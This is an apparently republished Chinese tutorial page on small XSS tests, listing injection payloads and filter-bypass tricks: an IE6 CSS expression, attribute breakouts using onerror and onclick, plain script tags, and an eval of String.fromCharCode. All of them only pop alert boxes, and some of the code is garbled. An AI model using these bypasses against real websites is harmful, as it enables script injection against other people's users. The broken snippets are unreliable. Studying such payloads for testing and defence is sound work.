xss的小測試是怎樣進(jìn)行的

發(fā)布時間：2022-01-10 10:19:39 來源：億速云閱讀：99 作者：柒染欄目：安全技術(shù)

小編今天帶大家了解xss的小測試是怎樣進(jìn)行的，文中知識點介紹的非常詳細(xì)。覺得有幫助的朋友可以跟著小編一起瀏覽文章的內(nèi)容，希望能夠幫助更多想解決這個問題的朋友找到問題的答案，下面跟著小編一起深入學(xué)習(xí)“xss的小測試是怎樣進(jìn)行的”的知識吧。

我們知道利用expression可以用來構(gòu)造XSS，但是只能在IE下面測試，所以下面的測試請在IE6中執(zhí)行。

body {
black;
xss:alert(/xss/));/*IE6下測試*/
}

測試輸入的字符會被插入到src地址中，那么可以使用偽協(xié)議來繞過。

直接輸入

alert( /xss/);

或者你也可以使用事件來繞過，注意閉合語句即可，如下：

1" onerror=alert(/xss/); var a="1

我測試了一下，大部分都過濾了，有部分未過濾，經(jīng)測試script/onerror過濾了，但是onclick未過濾，使用onclick事件繞過

<img src=# onclick=alert(/xss/);>

也就是說我們的XSS語句中不能出現(xiàn)單引號，雙引號等等特征字符。

直接使用

<script>alert(/xss/);</script>

即可繞過

或者使用String.fromCharCode方法，如下：

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

感謝大家的閱讀，以上就是“xss的小測試是怎樣進(jìn)行的”的全部內(nèi)容了，學(xué)會的朋友趕緊操作起來吧。相信億速云小編一定會給大家?guī)砀鼉?yōu)質(zhì)的文章。謝謝大家對億速云網(wǎng)站的支持！

向AI問一下細(xì)節(jié)

猜你喜歡